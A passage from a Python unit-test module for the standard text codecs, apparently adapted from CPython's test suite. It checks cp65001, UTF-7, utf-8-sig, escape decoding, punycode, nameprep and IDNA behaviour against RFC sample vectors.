                                  raw.decode, 'cp65001', errors)

    @yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_lone_surrogates(self):
        self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
        self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
        self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
                         b'[\\udc80]')
        # BUGFIX: the expected value below had been truncated to the
        # unterminated literal b'[& (a syntax error).  0xDC80 == 56448,
        # matching ReadTest.test_lone_surrogates' xmlcharrefreplace
        # expectation of "[&#56448;]".
        self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
                         b'[&#56448;]')
        self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
                         b'[\x80]')
        self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
                         b'[]')
        self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
                         b'[?]')

    @yp_unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_surrogatepass_handler(self):
        self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))

    def test_readline(self):
        self.skipTest("issue #20571: code page 65001 codec does not "
                      "support partial decoder yet")
@yp_unittest.skip_str_codecs
class UTF7Test(ReadTest, yp_unittest.TestCase):
    """Tests for the "utf-7" codec."""
    encoding = "utf-7"

    def test_partial(self):
        # Expected decoder output after each additional input byte.
        # "+-" decodes to a literal "+"; base64 runs ("+...") only emit
        # characters once enough bits have accumulated.
        self.check_partial(
            'a+-b\x00c\x80d\u0100e\U00010000f',
            [
                'a',
                'a',
                'a+',
                'a+-',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b\x00',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c\x80',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d\u0100',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e\U00010000',
                'a+-b\x00c\x80d\u0100e\U00010000f',
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace" output); strict decoding of
        # each must raise.  Covers truncated/ill-formed base64 sections.
        tests = [
            (b'a\xffb', 'a\ufffdb'),
            (b'a+IK', 'a\ufffd'),
            (b'a+IK-b', 'a\ufffdb'),
            (b'a+IK,b', 'a\ufffdb'),
            (b'a+IKx', 'a\u20ac\ufffd'),
            (b'a+IKx-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr', 'a\u20ac\ufffd'),
            (b'a+IKwgr-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr,', 'a\u20ac\ufffd'),
            (b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
            (b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
            (b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
            (b'a+/,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+//,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
            (b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
        ]
        for raw, expected in tests:
            with self.subTest(raw=raw):
                self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
                                  raw, 'strict', True)
                self.assertEqual(raw.decode('utf-7', 'replace'), expected)

    def test_nonbmp(self):
        # Non-BMP characters are encoded via their surrogate pair.
        self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')

    # Disable the inherited ReadTest check: UTF-7 has no single
    # "ill-formed sequence" representation for lone surrogates.
    test_lone_surrogates = None
@yp_unittest.skip_str_codecs
class UTF16ExTest(yp_unittest.TestCase):
    """Tests for the low-level codecs.utf_16_ex_decode() helper."""

    def test_errors(self):
        # A single stray byte cannot form a UTF-16 code unit.
        self.assertRaises(
            UnicodeDecodeError,
            codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)

    def test_bad_args(self):
        # The data argument is mandatory.
        self.assertRaises(TypeError, codecs.utf_16_ex_decode)
@yp_unittest.skip_str_codecs
class ReadBufferTest(yp_unittest.TestCase):
    """Tests for codecs.readbuffer_encode()."""

    def test_array(self):
        # Objects exposing the buffer protocol are accepted.
        import array
        buf = array.array("b", b"spam")
        self.assertEqual(codecs.readbuffer_encode(buf), (b"spam", 4))

    def test_empty(self):
        # An empty string maps to empty bytes and a consumed length of 0.
        self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))

    def test_bad_args(self):
        # Missing argument, or one without the buffer API, is a TypeError.
        self.assertRaises(TypeError, codecs.readbuffer_encode)
        self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
@yp_unittest.skip_str_codecs
class UTF8SigTest(UTF8Test, yp_unittest.TestCase):
    """Tests for "utf-8-sig": UTF-8 that skips exactly one leading BOM."""
    encoding = "utf-8-sig"

    def test_partial(self):
        # Only the first BOM is skipped; a second U+FEFF is real data.
        self.check_partial(
            "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "",
                "",
                "", # First BOM has been read and skipped
                "",
                "",
                "\ufeff", # Second BOM has been read and emitted
                "\ufeff\x00", # "\x00" read and emitted
                "\ufeff\x00", # First byte of encoded "\xff" read
                "\ufeff\x00\xff", # Second byte of encoded "\xff" read
                "\ufeff\x00\xff", # First byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_bug1601501(self):
        # SF bug #1601501: check that the codec works with a buffer
        self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")

    def test_bom(self):
        # Round trip: encoding prepends the BOM, decoding strips it.
        d = codecs.getincrementaldecoder("utf-8-sig")()
        s = "spam"
        self.assertEqual(d.decode(s.encode("utf-8-sig")), s)

    def test_stream_bom(self):
        # Reading a BOM-prefixed stream in various chunk sizes must
        # always strip the BOM exactly once.
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"

        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()

                if not data:
                    break

                ostream.write(data)

            got = ostream.getvalue()
            self.assertEqual(got, unistring)

    def test_stream_bare(self):
        # A stream without a BOM decodes identically, in any chunk size.
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"

        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()

                if not data:
                    break

                ostream.write(data)

            got = ostream.getvalue()
            self.assertEqual(got, unistring)
@yp_unittest.skip_str_codecs
class EscapeDecodeTest(yp_unittest.TestCase):
    """Tests for codecs.escape_decode() (bytes backslash-escape decoding)."""

    def test_empty(self):
        self.assertEqual(codecs.escape_decode(b""), (b"", 0))

    def test_raw(self):
        # Every byte other than the backslash passes through unchanged.
        decode = codecs.escape_decode
        for b in range(256):
            b = bytes([b])
            if b != b'\\':
                self.assertEqual(decode(b + b'0'), (b + b'0', 2))

    def test_escape(self):
        decode = codecs.escape_decode
        check = coding_checker(self, decode)
        # An escaped newline is dropped entirely.
        check(b"[\\\n]", b"[]")
        check(br'[\"]', b'["]')
        check(br"[\']", b"[']")
        check(br"[\\]", br"[\]")
        # Single-character escapes.
        check(br"[\a]", b"[\x07]")
        check(br"[\b]", b"[\x08]")
        check(br"[\t]", b"[\x09]")
        check(br"[\n]", b"[\x0a]")
        check(br"[\v]", b"[\x0b]")
        check(br"[\f]", b"[\x0c]")
        check(br"[\r]", b"[\x0d]")
        # Octal escapes take one to three digits; non-octal digits stop
        # the escape, and unknown escapes (\8) are left as-is.
        check(br"[\7]", b"[\x07]")
        check(br"[\8]", br"[\8]")
        check(br"[\78]", b"[\x078]")
        check(br"[\41]", b"[!]")
        check(br"[\418]", b"[!8]")
        check(br"[\101]", b"[A]")
        check(br"[\1010]", b"[A0]")
        # 0o501 == 321 decodes to chr(321 & 0xff) == 'A' here.
        check(br"[\501]", b"[A]")
        # Hex escapes need exactly two hex digits; \X is not special.
        check(br"[\x41]", b"[A]")
        check(br"[\X41]", br"[\X41]")
        check(br"[\x410]", b"[A0]")
        # Any other backslash pairing is passed through verbatim.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567x':
                b = bytes([b])
                check(b'\\' + b, b'\\' + b)

    def test_errors(self):
        # Truncated \x escapes honour the usual error handlers.
        decode = codecs.escape_decode
        self.assertRaises(ValueError, decode, br"\x")
        self.assertRaises(ValueError, decode, br"[\x]")
        self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
        self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
        self.assertRaises(ValueError, decode, br"\x0")
        self.assertRaises(ValueError, decode, br"[\x0]")
        self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
        self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
@yp_unittest.skip_str_codecs
class RecodingTest(yp_unittest.TestCase):
    def test_recoding(self):
        # Writing through an EncodedFile that recodes between two
        # encodings must not crash.
        f = io.BytesIO()
        f2 = codecs.EncodedFile(f, "unicode_internal", "utf-8")
        f2.write("a")
        f2.close()
        # Python used to crash on this at exit because of a refcount
        # bug in _codecsmodule.c
# From RFC 3492
# (unicode text, expected punycode bytes) sample-string pairs taken
# from section 7.1 of the RFC.
punycode_testcases = [
    # A Arabic (Egyptian):
    ("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
     "\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
     b"egbpdaj6bu4bxfgehfvwxn"),
    # B Chinese (simplified):
    ("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
     b"ihqwcrb4cv8a8dqg056pqjye"),
    # C Chinese (traditional):
    ("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
     b"ihqwctvzc91f659drss3x8bo0yb"),
    # D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
    ("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
     "\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
     "\u0065\u0073\u006B\u0079",
     b"Proprostnemluvesky-uyb24dma41a"),
    # E Hebrew:
    ("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
     "\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
     "\u05D1\u05E8\u05D9\u05EA",
     b"4dbcagdahymbxekheh6e0a7fei0b"),
    # F Hindi (Devanagari):
    ("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
     "\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
     "\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
     "\u0939\u0948\u0902",
     b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
    #(G) Japanese (kanji and hiragana):
    ("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
     "\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
     b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
    # (H) Korean (Hangul syllables):
    ("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
     "\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
     "\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
     b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
     b"psd879ccm6fea98c"),
    # (I) Russian (Cyrillic):
    ("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
     "\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
     "\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
     "\u0438",
     b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
    # (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
    ("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
     "\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
     "\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
     "\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
     "\u0061\u00F1\u006F\u006C",
     b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
    # (K) Vietnamese:
    # T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
    # <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
    ("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
     "\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
     "\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
     "\u0056\u0069\u1EC7\u0074",
     b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
    #(L) 3<nen>B<gumi><kinpachi><sensei>
    ("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
     b"3B-ww4c5e180e575a65lsy2b"),
    # (M) <amuro><namie>-with-SUPER-MONKEYS
    ("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
     "\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
     "\u004F\u004E\u004B\u0045\u0059\u0053",
     b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
    # (N) Hello-Another-Way-<sorezore><no><basho>
    ("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
     "\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
     "\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
     b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
    # (O) <hitotsu><yane><no><shita>2
    ("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
     b"2-u9tlzr9756bt3uc0v"),
    # (P) Maji<de>Koi<suru>5<byou><mae>
    ("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
     "\u308B\u0035\u79D2\u524D",
     b"MajiKoi5-783gue6qz075azm5e"),
    # (Q) <pafii>de<runba>
    ("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
     b"de-jg4avhby1noc0d"),
    # (R) <sono><supiido><de>
    ("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
     b"d9juau41awczczp"),
    # (S) -> $1.00 <-
    ("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
     "\u003C\u002D",
     b"-> $1.00 <--")
    ]

# Sanity check at import time: every vector must be a 2-tuple.
for i in punycode_testcases:
    if len(i)!=2:
        print(repr(i))
@yp_unittest.skip_str_codecs
class PunycodeTest(yp_unittest.TestCase):
    """Check the punycode codec against the RFC 3492 sample strings."""

    def test_encode(self):
        for uni, puny in punycode_testcases:
            # Compare case-insensitively: several RFC vectors contain
            # upper-case basic code points while our encoder emits only
            # lower case, and the inputs themselves may be mixed case,
            # so lowering just one side would not be enough.
            produced = str(uni.encode("punycode"), "ascii")
            expected = str(puny, "ascii")
            self.assertEqual(produced.lower(), expected.lower())

    def test_decode(self):
        for uni, puny in punycode_testcases:
            # Decoding works directly from the raw bytes ...
            self.assertEqual(uni, puny.decode("punycode"))
            # ... and from bytes that went through an ASCII round-trip.
            roundtripped = puny.decode("ascii").encode("ascii")
            self.assertEqual(uni, roundtripped.decode("punycode"))
@yp_unittest.skip_str_codecs
class UnicodeInternalTest(yp_unittest.TestCase):
    """Tests for the deprecated "unicode_internal" codec."""

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_bug1251300(self):
        # Decoding with unicode_internal used to not correctly handle "code
        # points" above 0x10ffff on UCS-4 builds (SF bug #1251300).
        ok = [
            (b"\x00\x10\xff\xff", "\U0010ffff"),
            (b"\x00\x00\x01\x01", "\U00000101"),
            (b"", ""),
        ]
        not_ok = [
            b"\x7f\xff\xff\xff",
            b"\x80\x00\x00\x00",
            b"\x81\x00\x00\x00",
            b"\x00",
            b"\x00\x00\x00\x00\x00",
        ]
        for internal, uni in ok:
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings():
                self.assertEqual(uni, internal.decode("unicode_internal"))
        for internal in not_ok:
            if sys.byteorder == "little":
                internal = bytes(reversed(internal))
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                self.assertRaises(UnicodeDecodeError, internal.decode,
                                  "unicode_internal")
        if sys.byteorder == "little":
            invalid = b"\x00\x00\x11\x00"
        else:
            invalid = b"\x00\x11\x00\x00"
        with support.check_warnings():
            self.assertRaises(UnicodeDecodeError,
                              invalid.decode, "unicode_internal")
        with support.check_warnings():
            self.assertEqual(invalid.decode("unicode_internal", "replace"),
                             '\ufffd')

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_error_attributes(self):
        # The UnicodeDecodeError raised must carry the codec name, the
        # original bytes and the exact offending range.
        try:
            with support.check_warnings(('unicode_internal codec has been '
                                         'deprecated', DeprecationWarning)):
                b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
        except UnicodeDecodeError as ex:
            self.assertEqual("unicode_internal", ex.encoding)
            self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
            self.assertEqual(4, ex.start)
            self.assertEqual(8, ex.end)
        else:
            self.fail()

    @yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
    def test_decode_callback(self):
        # A registered "ignore"-style error handler must skip the bad
        # 4-byte unit inserted between the two encoded characters.
        codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
        decoder = codecs.getdecoder("unicode_internal")
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            ab = "ab".encode("unicode_internal").decode()
            ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
                                    "ascii"),
                              "UnicodeInternalTest")
        self.assertEqual(("ab", 12), ignored)

    def test_encode_length(self):
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            # Issue 3739
            encoder = codecs.getencoder("unicode_internal")
            self.assertEqual(encoder("a")[1], 1)
            self.assertEqual(encoder("\xe9\u0142")[1], 2)

            self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
# (input, expected) nameprep vectors, both given as UTF-8 encoded bytes.
# expected None means the input must be rejected; a (None, None) entry
# marks a vector this suite skips.
nameprep_tests = [
    # 3.1 Map to nothing.
    (b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
     b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
     b'\xb8\x8f\xef\xbb\xbf',
     b'foobarbaz'),
    # 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
    (b'CAFE',
     b'cafe'),
    # 3.3 Case folding 8bit U+00DF (german sharp s).
    # The original test case is bogus; it says \xc3\xdf
    (b'\xc3\x9f',
     b'ss'),
    # 3.4 Case folding U+0130 (turkish capital I with dot).
    (b'\xc4\xb0',
     b'i\xcc\x87'),
    # 3.5 Case folding multibyte U+0143 U+037A.
    (b'\xc5\x83\xcd\xba',
     b'\xc5\x84 \xce\xb9'),
    # 3.6 Case folding U+2121 U+33C6 U+1D7BB.
    # XXX: skip this as it fails in UCS-2 mode
    #('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
    # 'telc\xe2\x88\x95kg\xcf\x83'),
    (None, None),
    # 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
    (b'j\xcc\x8c\xc2\xa0\xc2\xaa',
     b'\xc7\xb0 a'),
    # 3.8 Case folding U+1FB7 and normalization.
    (b'\xe1\xbe\xb7',
     b'\xe1\xbe\xb6\xce\xb9'),
    # 3.9 Self-reverting case folding U+01F0 and normalization.
    # The original test case is bogus, it says `\xc7\xf0'
    (b'\xc7\xb0',
     b'\xc7\xb0'),
    # 3.10 Self-reverting case folding U+0390 and normalization.
    (b'\xce\x90',
     b'\xce\x90'),
    # 3.11 Self-reverting case folding U+03B0 and normalization.
    (b'\xce\xb0',
     b'\xce\xb0'),
    # 3.12 Self-reverting case folding U+1E96 and normalization.
    (b'\xe1\xba\x96',
     b'\xe1\xba\x96'),
    # 3.13 Self-reverting case folding U+1F56 and normalization.
    (b'\xe1\xbd\x96',
     b'\xe1\xbd\x96'),
    # 3.14 ASCII space character U+0020.
    (b' ',
     b' '),
    # 3.15 Non-ASCII 8bit space character U+00A0.
    (b'\xc2\xa0',
     b' '),
    # 3.16 Non-ASCII multibyte space character U+1680.
    (b'\xe1\x9a\x80',
     None),
    # 3.17 Non-ASCII multibyte space character U+2000.
    (b'\xe2\x80\x80',
     b' '),
    # 3.18 Zero Width Space U+200b.
    (b'\xe2\x80\x8b',
     b''),
    # 3.19 Non-ASCII multibyte space character U+3000.
    (b'\xe3\x80\x80',
     b' '),
    # 3.20 ASCII control characters U+0010 U+007F.
    (b'\x10\x7f',
     b'\x10\x7f'),
    # 3.21 Non-ASCII 8bit control character U+0085.
    (b'\xc2\x85',
     None),
    # 3.22 Non-ASCII multibyte control character U+180E.
    (b'\xe1\xa0\x8e',
     None),
    # 3.23 Zero Width No-Break Space U+FEFF.
    (b'\xef\xbb\xbf',
     b''),
    # 3.24 Non-ASCII control character U+1D175.
    (b'\xf0\x9d\x85\xb5',
     None),
    # 3.25 Plane 0 private use character U+F123.
    (b'\xef\x84\xa3',
     None),
    # 3.26 Plane 15 private use character U+F1234.
    (b'\xf3\xb1\x88\xb4',
     None),
    # 3.27 Plane 16 private use character U+10F234.
    (b'\xf4\x8f\x88\xb4',
     None),
    # 3.28 Non-character code point U+8FFFE.
    (b'\xf2\x8f\xbf\xbe',
     None),
    # 3.29 Non-character code point U+10FFFF.
    (b'\xf4\x8f\xbf\xbf',
     None),
    # 3.30 Surrogate code U+DF42.
    (b'\xed\xbd\x82',
     None),
    # 3.31 Non-plain text character U+FFFD.
    (b'\xef\xbf\xbd',
     None),
    # 3.32 Ideographic description character U+2FF5.
    (b'\xe2\xbf\xb5',
     None),
    # 3.33 Display property character U+0341.
    (b'\xcd\x81',
     b'\xcc\x81'),
    # 3.34 Left-to-right mark U+200E.
    (b'\xe2\x80\x8e',
     None),
    # 3.35 Deprecated U+202A.
    (b'\xe2\x80\xaa',
     None),
    # 3.36 Language tagging character U+E0001.
    (b'\xf3\xa0\x80\x81',
     None),
    # 3.37 Language tagging character U+E0042.
    (b'\xf3\xa0\x81\x82',
     None),
    # 3.38 Bidi: RandALCat character U+05BE and LCat characters.
    (b'foo\xd6\xbebar',
     None),
    # 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
    (b'foo\xef\xb5\x90bar',
     None),
    # 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
    (b'foo\xef\xb9\xb6bar',
     b'foo \xd9\x8ebar'),
    # 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
    (b'\xd8\xa71',
     None),
    # 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
    (b'\xd8\xa71\xd8\xa8',
     b'\xd8\xa71\xd8\xa8'),
    # 3.43 Unassigned code point U+E0002.
    # Skip this test as we allow unassigned
    #(b'\xf3\xa0\x80\x82',
    # None),
    (None, None),
    # 3.44 Larger test (shrinking).
    # Original test case reads \xc3\xdf
    (b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
     b'\xaa\xce\xb0\xe2\x80\x80',
     b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
    # 3.45 Larger test (expanding).
    # Original test case reads \xc3\x9f
    (b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
     b'\x80',
     b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
     b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
     b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
    ]
@yp_unittest.skip_str_codecs
class NameprepTest(yp_unittest.TestCase):
    """Exercise encodings.idna.nameprep against the RFC 3491 appendix vectors."""
    def test_nameprep(self):
        from encodings.idna import nameprep
        # Vectors are numbered 3.1, 3.2, ... in the RFC; start counting at 1.
        for index, (raw, expected) in enumerate(nameprep_tests, start=1):
            if raw is None:
                # Vector deliberately disabled (e.g. unassigned code points
                # are allowed by this implementation).
                continue
            # The vectors are stored as UTF-8 byte strings.
            raw = str(raw, "utf-8", "surrogatepass")
            if expected is None:
                # Prohibited input: nameprep must reject it.
                self.assertRaises(UnicodeError, nameprep, raw)
            else:
                expected = str(expected, "utf-8", "surrogatepass")
                try:
                    self.assertEqual(nameprep(raw), expected)
                except Exception as exc:
                    raise support.TestFailed("Test 3.%d: %s" % (index, str(exc)))
@yp_unittest.skip_str_codecs
class IDNACodecTest(yp_unittest.TestCase):
    """Tests for the "idna" codec (internationalized domain names)."""
    def test_builtin_decode(self):
        # ASCII labels pass through; "xn--" labels are Punycode-decoded.
        # A trailing dot (empty root label) must be preserved.
        self.assertEqual(str(b"python.org", "idna"), "python.org")
        self.assertEqual(str(b"python.org.", "idna"), "python.org.")
        self.assertEqual(str(b"xn--pythn-mua.org", "idna"), "pyth\xf6n.org")
        self.assertEqual(str(b"xn--pythn-mua.org.", "idna"), "pyth\xf6n.org.")
    def test_builtin_encode(self):
        # Non-ASCII labels are encoded to their ASCII "xn--" Punycode form.
        self.assertEqual("python.org".encode("idna"), b"python.org")
        self.assertEqual("python.org.".encode("idna"), b"python.org.")
        self.assertEqual("pyth\xf6n.org".encode("idna"), b"xn--pythn-mua.org")
        self.assertEqual("pyth\xf6n.org.".encode("idna"), b"xn--pythn-mua.org.")
    def test_stream(self):
        # A sized read followed by read() must not duplicate or lose data.
        r = codecs.getreader("idna")(io.BytesIO(b"abc"))
        r.read(3)
        self.assertEqual(r.read(), "")
    def test_incremental_decode(self):
        # Feeding one byte at a time must match one-shot decoding.
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"python.org"), "idna")),
            "python.org"
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"python.org."), "idna")),
            "python.org."
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
            "pyth\xf6n.org."
        )
        self.assertEqual(
            "".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
            "pyth\xf6n.org."
        )
        # The incremental decoder buffers an incomplete label until it sees
        # the label separator (".") or the final=True flush.
        decoder = codecs.getincrementaldecoder("idna")()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg"), "")
        self.assertEqual(decoder.decode(b"", True), "org")
        # reset() must discard any buffered partial label.
        decoder.reset()
        self.assertEqual(decoder.decode(b"xn--xam", ), "")
